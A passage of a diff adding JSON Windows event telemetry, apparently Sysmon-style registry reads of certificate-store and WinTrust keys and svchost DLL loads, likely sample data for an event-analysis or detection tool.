"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 